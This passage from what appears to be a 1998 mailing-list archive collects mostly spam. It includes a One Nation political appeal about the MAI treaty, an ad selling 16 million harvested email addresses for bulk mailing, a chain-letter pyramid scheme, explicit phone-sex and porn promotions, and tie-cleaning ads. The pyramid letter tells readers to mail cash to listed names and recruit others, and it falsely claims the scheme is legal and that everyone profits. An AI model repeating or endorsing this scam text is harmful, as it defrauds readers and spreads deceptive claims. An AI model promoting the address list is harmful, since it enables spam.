voter, are being misled by the mainstream political parties. In a word the
subject is 'MAI' an international agreement to which Australia will be a
signatory. MAI is being debated more and more on the Internet through the
World Wide Web.

Here are some web site links on the subject. Please take the time to visit
these sites because they demonstrate how the transnational companies,
through MAI (the multilateral agreement on investment), are bargaining away
your future with senior Canberra-based bureaucrats.

1) ABC interview - full transcript:
http://www.gwb.com.au/gwb/news/onenation/press/maiabc.html
Extract: 'Sadly there's no catch title for this trade deal. It's called the
Multilateral Agreement on Investment, or MAI. But what it promises holds
more drama. It aims to grant multinational corporations unprecedented powers
over governments. And it's not getting many good reviews.'

and

'In effect, the MAI is a bill of rights for international giants like Shell,
Lockheed, Du Pont, and Arthur Andersen. It prevents governments asking more
of those multinationals than they ask of their own domestic companies. And
any laws that discriminate in favour of locals, such as Australian media
ownership laws, don't fit.'

2) MAI Information Centre (Canada):
http://www.islandnet.com/~ncfs/maisite/homepage.htm
Extract: 'It incorporates a powerful dispute resolution system which would
allow any investor to sue the government of its host nation if it considers
laws or regulations to be discriminatory and detrimental to immediate or
projected profits. The Agreement would therefore disable regional
development and national measures to protect the well-being of people,
create employment, safeguard small business, conserve resources and protect
the environment. Once signed, the MAI cannot be denounced for five years.
Investments under the MAI would remain protected for a further fifteen years.'

The MAI debate is being discussed openly in Canada and New Zealand while in
Australia we are being closeted from this debate by the duopoly which runs
this country's media.

It is a very real issue. An issue that the major parties refuse to bring out
into the open. An issue, amongst many, many others that Pauline Hanson's One
Nation is trying to expose. BUT we cannot do that without your support.

Your vote and those of your friends will be critical to ensure that issues
such as MAI are heard, are questioned, can be rejected by you and I - the
Australian people. Clearly the major political parties have failed in
drawing issues like this out into the public arena for discussion.



Pauline Hanson

PS. If you are able to help with donations to help us fund our candidates in
state and federal elections this year please visit:
http://www.gwb.com.au/pledge.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: busadmn@ix.netcom.com
Date: Thu, 8 Jan 1998 12:33:23 -0800 (PST)
To: Friend@public.com
Subject: Just Released!  16 Million!
Message-ID: <67101850_17330549>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in  excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 150+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.   We received it just
prior to finishing production work on the new CD.   We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
sample of addresses from any list.   We were able to have the program
take every 9th address, thus giving us a 300,000 list of Cyber's email
addresses from top to bottom.  We did not clean  these, but we did create
3 seperate files named cyber1.txt, cyber2.txt, & cyber3.txt of 100,000
addresses each. This will give all people that use the list a opportunity to
send mail to the list before deciding if their CD is all it's hyped to be.

We also included a 2+ million "Remove/Flamer" file broke into seperate
files for ease of  extracting and adding to your own database of removes.

 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What others are saying:
 
"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over
the course of the weekend, I emailed out over 500,000 emails and I
received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"

Dave Buckley
Houston,  TX

"This list is worth it's weight in gold!!  I sent out 100,000 emails for my
product and received over 55 orders!

Ann Colby
New Orleans, LA

****************************************
 
                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files).
All files are separated by domain name for your convenience.
 
PLUS you receive a tremendous REMOVE list!
 
AND
 
the a sampling of CyberPromo's HOT list.

>>> NOW ONLY $149.00!

This price is effective for the next seven days, thereafter the price will be
$199.00 so ORDER NOW!

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove
Requests.
 
The result is the Cleanest Email Addresses Available Anywhere
to use over and over again, for a FRACTION of the cost that other
companies charge. Typical rates for acquiring email lists are from
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most
effective way to market anywhere..PERIOD!

If you have any further questions or to place an order by
phone, please do not hesitate to call us at:

                              908-245-1143

To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax and Mail.
 
 _________________
EZ Order Form
 
 
 _____Yes! I would like to order MILLIONS Vol. 1 email addresses
for only $149.00.
 
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-908-245-3119
 
CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-908-245-3119

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-908-245-3119
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.

If you feel more comfortable sending payment through the mail,
please send all forms and Check or Money Order to:
 
Rapture Marketing Inc.
P.O. Box 616
Kenilworth, NJ 07033






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cuajuazu@prodigy.com
Date: Thu, 8 Jan 1998 20:07:10 -0800 (PST)
To: cuajuazu@prodigy.com
Subject: happy?
Message-ID: <199801084172DAA45004@post.it>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE>

<FONT  COLOR="#000000" SIZE=3>   <FONT  COLOR="#000000" SIZE=2>                    <FONT  COLOR="#ff0000" SIZE=5> <B>QUIT YOUR JOB WITHIN 2 MONTHS !  </FONT><FONT  COLOR="#000000" SIZE=3></B>
                  
                          <FONT  COLOR="#008080" SIZE=5><B>$1,000,000.00     IN 6 MONTHS ! 

                               </FONT><FONT  COLOR="#ff0000" SIZE=5>ALL  NEW!</FONT><FONT  COLOR="#008080" SIZE=5>
     <FONT  COLOR="#008080" SIZE=4> <FONT  COLOR="#008080" SIZE=2> 0   0     <FONT  COLOR="#008080" SIZE=5>      </FONT><FONT  COLOR="#ff0000" SIZE=3>TAKE MATTERS INTO YOUR OWN HANDS!</FONT><FONT  COLOR="#008080" SIZE=5>     <FONT  COLOR="#008080" SIZE=4>   <FONT  COLOR="#008080" SIZE=2>   0   0<FONT  COLOR="#008080" SIZE=1> <FONT  COLOR="#008080" SIZE=5>                    <FONT  COLOR="#008080" SIZE=3>                       
           <                                                                                                ></FONT><FONT  COLOR="#000000" SIZE=3></B>
           <FONT  COLOR="#008040" SIZE=3>\_/ <B> </FONT><FONT  COLOR="#000000" SIZE=3></B>           <FONT  COLOR="#0080ff" SIZE=3> <B>YOU ARE ONE OF THE FIRST TO SEE THIS</FONT><FONT  COLOR="#000000" SIZE=3></B>           <FONT  COLOR="#008000" SIZE=3> \_/   </FONT><FONT  COLOR="#000000" SIZE=3>      
                        
        <FONT  COLOR="#0080c0" SIZE=3><B> </FONT><FONT  COLOR="#0080ff" SIZE=3></B>HELP OTHERS SUCCEED, A "WIN-WIN"  PROPOSITION LIKE NO OTHER</FONT><FONT  COLOR="#0080c0" SIZE=3>!  </FONT><FONT  COLOR="#000000" SIZE=3>                                                   
                        
             <FONT  COLOR="#0080ff" SIZE=3> WE HAVE TAKEN A SUCCESSFUL FORMULA AND <B>MASTERED IT!</B>!!!!!!</FONT><FONT  COLOR="#000000" SIZE=3>                  <B>                         
                        
                            <FONT  COLOR="#0080ff" SIZE=3> HELP YOUR FRIENDS AND FAMILY SUCCEED    </FONT><FONT  COLOR="#000000" SIZE=3>  </B>                        
                   
   <B> I absolutely disliked my job. Working for someone else was beating me up.
   I wanted freedom . That is all I wanted. Free of my boss , free of a schedule,
          free of paying bills .Freedom to spend time with my family. 
              Freedom to do whatever I wanted , whenever I wanted.
                       Sound like a fairy tale?   Sound like a pipe dream? 
                              Well people, here is your reality check.
</B>
          18 months ago I was living the normal everyday life. Job, bills,not much
time and not entirely happy.Sometimes I was happy, but I wasn't living the life 
I had envisioned myself living 10 years earlier. Things weren't going as planned.
I was happily married with 2 children , but still I felt like life was designing me
instead of me designing my life. I reached a point were I decided I needed a 
jumpstart. I started filling my mind with positive, motivational ideas that I read in 
books. I started going to seminars to try to stimulate my mind as well as my life.
    
         I began believing and KNOWING that things were going to change in a BIG way,
but I didn't know from where. Then something funny happenned. While looking through my email, I came across this success program that said I could make a large amount of money in a short period of time rather easily. I decided , "what the hell , it's only $20" and tried it. Little did I realize that I was one of the first to see that message that everyone has seen and deleted  hundreds of times. Right place at the right time?
Maybe. I think It's more like my mind was ready for an opportunity and there it was.
<B> </B>I was barely able to turn a computer on , but I managed and learned and more money flew in than I knew what to do with . I organized . It exploded even more. I made more money in 3 months than I made at my job in the last 5 years! So I quit my job and started doing this full time - a few hours a day. 

 I have never felt more confident and better about myself in my whole life . My life has exceded every expectation, in so many ways, in such a short time that it borders on divine intervention. Well that program has long since reached it's peak and changed so many times that it's almost dead. What we have here is the same formula only accelerated and improved . We have removed the useless reports of the last program and added some that will blow your mind , The reports could literally change your life in many ways and help those around you. But anyway, please read on .<B>You are one of the first to see this . Your opportunity is now.</B>
<B>
   </B>
Email has come along way .It is still almost totally free-except for your ISP account. You can literally reach millions of people at no cost. This sure beats postal delivery . Our program will get even the beginner computer user on the path of success.<B>                 
</B>Of course over the last few months a few road blocks have appeared that has hindered many success programs.                
These are;    <B>                   </B>                                            
                                                             
  1. goverment is trying to pass legislation to limit or stop what                             
has until now been a free way of advertising. Email will be severly                             
restricted, very, very soon.Up until now,this type of program is 100%                             
legal and has no laws governing it. Soon this will change.                 
                                       
                                   *******************                              
 2.Internet service providers ,usch as AOL and Compuserve are really                             
trying their best to end unsolicited Emailing.                 
                                                   
                                   *******************                             
  3. Once you have seen a certain program that has "flooded" the                             
internet lines, it is already too late. The People who have made                             
money are on to bigger and brighter things, and the majority of                             
people will just delete the Email because they have seen it hundreds                             
of times already.                          
                                  ********************                  
                            
   4.  OTHER PROGRAMS HAVE PRODUCTS AND REPORTS THAT ARE THERE                             
SPECIFICALLY TO JUSTIFY THE PROGRAM( make them legal). This program has a                            
 <B>great product</B> that can change peoples lives and help others around                             
them .
                          
                                 $$$$$$$$$$$$$$$$$$$$$                          
                                                                                                  
     <B>  <FONT  COLOR="#ff0000" SIZE=3>IF YOU EVER THOUGHT OF TRYING A PROGRAM , NOW IS THE                             
                         TIME AND THIS IS THE PROGRAM! </B>         </FONT><FONT  COLOR="#000000" SIZE=3>         
                           
                                 $$$$$$$$$$$$$$$$$$$$$                                     
                            
                                                  
          Prior reports from similer programs , were                             
basically there only to justify the program. These NEW reports                             
are - <B>PRICELESS! </B> The reports are unbelivable! The information in the                             
programs alone may change your life;                                                    
               financially,emotionally,spiritually, in every way!                                 
                            
       If you have tried other Email programs and had limited                             
success, it was because of three things ;                                 
         <B> 1. EFFORT                               
          2. TIMING                                   
          3. PRODUCT  </B>                             
                            
                                                               
                                            THIS PROGRAM                             
TAKES CARE OF ISSUES #2 AND #3 . THE EFFORT IS UP TO YOU.                            
 I can not stress how much of the success of a program depends on the                             
product and ease of use. Here is your chance , I do not know how long                             
you will have this opportunity, only the goverment can decide.                         
                            
   <B> IT IS A CAN'T LOSE - "WIN-WIN"  OPPORTUNITY!!   </B>                            
                              
    ********************************************************************                             
   <B> THIS PROGRAM ,UNLIKE THE OTHERS , HAS A GREAT PRODUCT                               
    AND IT WILL SUCCEED FOR THE SOLE PURPOSE OF PEOPLE  TRYING TO                             
    HELP OTHERS LIVE AND ENJOY LIFE TO THE FULLEST </B>                              
                                       
    *********************************************************************                                      
                                                  
    <B>THIS IS THE PROGRAM TO TRY ! YOU MAY NOT GET ANOTHER CHANCE! </B>        
                          
                                   
   Here is how the program works;                            
                            
Print this now for future reference***********************                            
This is a money making phenomenon !!!!!!!!!!  You are looking at the                            
most profitable and unique program you may ever see.  It is proven                             
to generate large sums of money and it is completely legal.  It does                             
not require you to come in contact with people, it doesn't require                             
hard work and you never have to leave the house .                           
                            
We sell thousands of people a product for $10.00 that costs very little to produce                            
on e-mail.  We build our business by recruiting new members and                             
partners and selling our products.                            
                            
The product in this program is a series of 4 reports providing tips for financial,                            
emotional and spiritial gain.  Each $10.00 order you receive by mail                             
will include the e-mail address of the sender.  To fill the order,                             
simply e-mail the report to the buyer, that's it!!!!!!!!!!!!  The                             
$10.00 they send is yours simply for sending the report via e-mail.                            
                            
         <B>YOU MUST FOLLOW THE INSTRUCTIONS EXACTLY!</B>                
                            
This is what you do ............................                            
                            
1.Order all 4 reports that are listed below.  For each report you send                            
 $10.00 cash, your e-mail address, return postal address (in case of                             
mail errors) to each person listed below.  When you order, be sure to                             
list the specific report you need.  You will need all 4 reports to                             
save on your computer for reselling them.                            
                            
2. <B>IMPORTANT  Do not alter the names, or the sequence that they                            
are in or you will not profit the way you should.THIS IS A KEY TO                             
MAKING THE PROGRAM WORK. It is not fair to the others in the program                             
if you do not follow the program exactly. DO UNTO OTHERS AS YOU WOULD                             
LIKE THEM TO DO UNTO YOU! -the golden rule of life .                            
        </B>                    
3. Replace the name and address under REPORT #1 with your name and move the                            
name that was there down to REPORT #2.  Move the name on REPORT #2                             
to REPORT #3 and so on eliminating the name on report #4.  They are                              
well on their way to financial independance by now so don't worry .                              
Copy the names and addresses accurately and do not remove the                             
Report/Product positions.                            
                            
Take this entire text and save it on your computer.                            
                            
Now your ready to start selling your product on the web.  Start your campaign as                
soon as you can!!!!!!!!!!!!!!!                                
                            
***********ALWAYS PROVIDE SAME DAY SERVICE*******************                            
                            
ALWAYS SEND $10.00 CASH FOR EACH ORDER (CONCEALED) FOR EACH ORDER  REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER.  ALWAYS SEND MAIL FIRST CLASS AND PROVIDE YOUR E MAIL ADDRESS                
FOR QUICK DELIVERY.                             
                            

____________________________________________________                            
REPORT #1 <B>"EMAIL MILLIONAIRES-THE ROAD TO INDEPENDANCE" </B>                           
ORDER REPORT #1 FROM:                              
A&L INC.                            
113 MT. HERMON WAY                             
OCEAN GROVE , N.J. 07756                            
_____________________________________________________                            
REPORT #2 <B>"REAL ESTATE -'THE ART OF THE FLIP'"            </B>                
ORDER REPORT #2 FROM:                            
SMITH & CO.                            
P.O. BOX 678                             
KEYPORT N.J. 07735                            
_____________________________________________________                            
REPORT #3 <B>"MAKE 10-20% A MONTH IN STOCKS" </B>                           
ORDER REPORT #3 FROM:                            
MS INC.                            
46 W. SHORE ST                            
KEANSBURG N.J. 07734                            
______________________________________________________                            
REPORT #4 <B>"THE STRANGEST SECRET " </B>                           
ORDER REPORT #4 FROM:                            
McCollough                             
504 13th ave                            
Belmar N.J. 07719                            
______________________________________________________                            
                            
HERE'S HOW THIS AMAZING PLAN WILL EARN YOU MONEY                            
Let's say you decide to start small just to see how it goes.                            
Assume your goal is to get only 20 people to participate on your first level.                            
(Placing FREE ads on the internet could get a better response.)                            
                            
Also assume that everyone else in YOUR BUILDING ORGANIZATION                            
gets only 20 downline members.  Follow this example for the STAGGERING                             
results below:                            
                            
1st level -- your 20 members with 10  ($10 x 20)                 $200    (position 1)                            
2nd level --20 members from those 20 ($10 x 400)              $4000    (position 2)                            
3rd level -- 20 members from those 400 ($10 x 8,000)         $80,000   (position 3)                            
4th level -- 20 members from those 8,000 ($10 x 160,000)   $1,600,000   (position 4)                            
                                                THIS TOTALS----------->  <B> $1,684,200.00 !!!!!!!!!                            
                        </B>    
Remember friends, this is assuming that the people who participate only                            
recruit 20 people each.  Imagine what the response would be if you only  got 10 more people to participate!                            
Some people get 100's of recruits!                              
STOP AND THINK ABOUT IT!                            
                            
By the way, your cost to participate in this is practically nothing.                            
You obviously already have an internet connection and e-mail is FREE!!!                            
                            
REMEMBER:  Approx. 50,000 new people get online monthly!                            
ORDER YOUR REPORTS NOW!!!                            
                            
                              *******TIPS FOR SUCCESS*******                            
                            
TREAT THIS AS YOUR BUSINESS!                            
Send for the four reports IMMEDIATELY, so you will have them when the                            
orders start coming in because: When you receive a $10 order, you MUST                            
send out the requested product/report to comply with the                            
U.S. Postal & Lottery Laws, Title 18, Sections 1302 and 1341 or Title 18,                            
Section 3005 in the U.S. Code, also Code of Federal Regs. vol. 16,                            
Sections 255 and 436, which state that:                            
"a product or service must be exchanged for money received."                            
                            
 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE. *                            
Be patient and persistent with this program.  If you follow the instructions                            
EXACTLY the results WILL undoubtedly be SUCCESS!                            
 *  ABOVE ALL, HAVE FAITH IN YOURSELF THAT YOU CAN SUCCEED!                            
                            
                          *******YOUR SUCCESS GUIDELINE*******                            
                            
The check point that guarantees your success is simply this:                            
You MUST receive 10 to 20 orders for REPORT #1!  THIS IS A MUST!                            
If you don't within two weeks, advertise more and send out more programs                             
until you do.  Then, a couple of weeks later you should receive at least 100                            
orders for REPORT #2.  If you don't, advertise more and send out more                             
programs until you do.  Once you have received 100 or more orders for                             
REPORT #2, YOU CAN RELAX, because you will be on your way to the                             
BANK!  Or, you can DOUBLE your efforts!                            
                            
REMEMBER:  Every time your name is moved down on the list you are in front                            
of a DIFFERENT report, so you can KEEP TRACK of your PROGRESS by                            
what report people are ordering from you.                            
IT'S THAT EASY!!!                           
                                               
====================================================                            
<B>ORDER TODAY AND GET STARTED ON THE PATH TO YOUR FINANCIAL FREEDOM!!!  </B>                          
                            
Very few people reach financial independence, because when                            
opportunity knocks, they choose to ignore it.  It is much easier to say                            
"NO" than "YES", and this is the question that you must answer.                            
Will YOU ignore this amazing opportunity or will you take advantage of it?                            
If you do nothing, you have indeed missed something and nothing will change.                            
Please re-read this material, this is a special opportunity.  My method is simple.                            
I sell thousands of people a product for $10 that costs me pennies to produce                            
and e-mail.  I should also point out this program is legal and everyone who                            
participates WILL make money.  This is not a chain letter or pyramid scam.                            
This is a business!  You are offering a awesome product to your people.                            
After they purchase the product from you, they reproduce more and resell them.                            
The information contained in these REPORTS IS UNBELIEVABLE!  They                             
will not only help you in making your participation in this program                             
more rewarding, but THEY MAY CHANGE YOUR LIFE AND HELP THOSE YOU LOVE                             
AND CARE ABOUT! .  You are also buying the rights to reprint all of                             
the REPORTS, which will be ordered from you by those to whom you mail                             
this program.  The concise REPORTS you will be buying are easy to                             
duplicate for your entrepreneurial endeavor.                            
                            
           Thank you for your attention.  Now make the decision that's right for you.   


</PRE></HTML>
u




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 30469616@juno.com
Date: Fri, 9 Jan 1998 06:04:15 -0800 (PST)
To: yyetrwiiuryte67589@kuic.kyonggi.ac.kr
Subject: WHY NOT GIVE ME A CALL.......
Message-ID: <12876de 0>
MIME-Version: 1.0
Content-Type: text/plain


HEY MAN ! 
THE HOTEST LIVE PHONE SEX EVER
YOU CAN CHOOSE FROM 1 TO 1 OR A PARTY LINE..
THE BEST DATING SERVICE EVER.
I'M ALL HOT AND WET AND WAITING FOR YOU
WE WIL LIVE OUR BEST MOMENTS TOGETHER
CALL ME FOR THE BEST PHONE SEX EVER 
CALL ME NOW AT : 1-268-404-6628
NO CREDIT CARD NEEDED, NO 900 NUMBER,
FOR REAL ADULTS ONLY
CALL NOW 1-268-404-6628





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 9 Jan 1998 01:48:09 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 9 '98
Message-ID: <19980109082002.25639.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

INFINITE PLEASURES
This site is  loaded with lots of free pix to say the least!
All of the categories are  plainly listed for fast  surfing.
Bingo!  They also have some great free videos! Lots of bush!
Infinite Pleasures ...... http://www.infinite-pleasures.com/

INNOCENCE LOST
"Two beautiful women whom have  agreed to "lose" their inno-
cence in the presence of our cameras.." Here we have two hot
young ladies doing a nice  little romp on a daybed.  The pix
are high  resolution, so you can see it all.  They start out
slow but then it gets going with a mutual hooter connection!
Innocence ....... http://www.firstsightimages.com/innocence/

FREE SNATCH
Hey, I guess the price is right. At this site they have well
laid out pix.  These include, anal,  blowjobs, cumshots, hot
sluts, group sex, lesbians and fucking.  Not a bad mix here!
Free Snatch ..................... http://www.freesnatch.com/

PORN CENTRAL
Way down at the bottom of the main frame you'll find lots of
free pix.  These are some good ones.  One features two babes
pouring honey on each other. Sweet and stick nipples, Yummy!
Porn Central ................... http://www.porncentral.com/

FREE CONTEST!
If you  haven't won free 3 month  membership to HardCoreSmut
yet,  today is your  last chance.  If the competition is too
tough, then just give them your money, once you're a member,
your  accountant will be the last thing on your mind.  Visit
Hardcoresmut  and click on  "Free Guided Tour" for the tour.
Email the answer (found in Hardcore Games) to this question:
"These hardcore games are the ultimate in what?"............
Send answers to ............. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Just 18 ........................ http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
JAMIE WYLDE: A 36 year old Canadian amateur who has the body
of a goddess! She loves lingerie - and that is good news for
you, because she looks oohh so good in it. She loves to work
out and it shows.  Jamie could definitely keep you warm dur-
ing the cold winter!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY MPEG AND CARTOON
These  video clips  feature the  best of  Raffaelli's erotic
masterpieces,  portraying exotic, single girls in autoerotic
masturbation.  The cartoons are  very good  for a laugh too!
Daily Mpeg & Cartoon .... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?090
Pic  2 ........................... http://137.39.63.229/?091
Pic  3 ........................... http://137.39.63.229/?092
Pic  4 ........................... http://137.39.63.229/?093
Pic  5 ........................... http://137.39.63.229/?094
Pic  6 ........................... http://137.39.63.229/?095
Pic  7 ........................... http://137.39.63.229/?096
Pic  8 ........................... http://137.39.63.229/?097
Pic  9 ........................... http://137.39.63.229/?098
Pic 10 ........................... http://137.39.63.229/?099

PLEASE VISIT THIS EUREKA! PARTNER SITE
THE ULTIMATE HARDCORE SITES
http://sexplosion.com/adverts.shtml
An incredible collection of over 30 sites featuring the
hottest free hardcore photos. The pix are easy to find and
the sites are all very accessible. You won't be
disappointed.

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wogague2@toyoma-u.ac.jp
Date: Fri, 9 Jan 1998 17:19:40 -0800 (PST)
To: wogague2@toyoma-u.ac.jp
Subject: XXX ADULT SEX!!!
Message-ID: <199801093232RAA5626@post.183.199.26>
MIME-Version: 1.0
Content-Type: text/plain


The LARGEST selection of Hot Beautiful XXX Live Girls
from the  U.S.A. & Europe!!! 

Voted as the 1998 best Adult Site!  

*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds & Chatrooms!!! 
*FREE Erotic Stories!!
*1,000's of Free Pictures of XXX Porn Stars!!
*Confessions!!!
*Plus Free Pictures of Teens & Men!!!
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it on this page. See for yourself, go check it out!!!

You must be 21 or older.

Please copy and paste the link below into your browser, and press enter.

http://www.search.com/Infoseek/1,135,0,0200.html?OLDQUERY=
pussyclub+&QUERY=pussyclub+&COLL=11&START=10&OLDCOLL=WW


If you take offense to this email & wish to be taken off our list,
simply  e-mail us at: stanleyo@hotmail.com
We are sorry for any inco




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ForOfficeCall@1-713-524-3303
Date: Fri, 9 Jan 1998 23:43:27 -0800 (PST)
To: SharpFolks@UwiseFolk.com
Subject: Your Ties Deserve Our Expert Touch!
Message-ID: <28174893_22711452>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******
-----------------------------------------------------------------
TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-
						  
	     Your Ties Deserve Our Expert Touch

   Tie cleaning..richly hand finished....$ 7.95 each 4 minimum

   Ties altered..widen,narrowed,tips.....$12.50 each 2 minimum
		 reshaped and hand sewn,etc

	  Clean/alter..$17.50 each.....4 minimum

       Specialty scarf cleaning..$25.00 each....2 minimum

  Retunrn by UPS add $5.00 in the USA...our cost outside of USA.
		 In Texas add 8.25% Sales Tax

	     QUALITY care for NECKWARE since 1952

		       MC,VISA,DISCOVER 
		 
		      Send ties to:
		      HOLSEY CUSTOM CLOTHES
		      2613 Richmond Ave.  
		      Houston, Texas 77098
		      713-524-3303 

		      Ask about our Web Page.
		      After 5PM this number is 
		      forwared to our voice mail.

TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING- 
******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: REMOVE-b@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ForOfficeCall@1-713-524-3303
Date: Sat, 10 Jan 1998 00:19:21 -0800 (PST)
To: SharpFolks@UwiseFolk.com
Subject: Your Ties Deserve Our Expert Touch!        (c)
Message-ID: <80086500_80738792>
MIME-Version: 1.0
Content-Type: text/plain



*********************************************************************
  - Remove from list information is after this important message -
*********************************************************************
                              *******
-----------------------------------------------------------------
TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-
						  
	     Your Ties Deserve Our Expert Touch

   Tie cleaning..richly hand finished....$ 7.95 each 4 minimum

   Ties altered..widen,narrowed,tips.....$12.50 each 2 minimum
		 reshaped and hand sewn,etc

	  Clean/alter..$17.50 each.....4 minimum

       Specialty scarf cleaning..$25.00 each....2 minimum

  Retunrn by UPS add $5.00 in the USA...our cost outside of USA.
		 In Texas add 8.25% Sales Tax

	     QUALITY care for NECKWARE since 1952

		       MC,VISA,DISCOVER 
		 
		      Send ties to:
		      HOLSEY CUSTOM CLOTHES
		      2613 Richmond Ave.  
		      Houston, Texas 77098
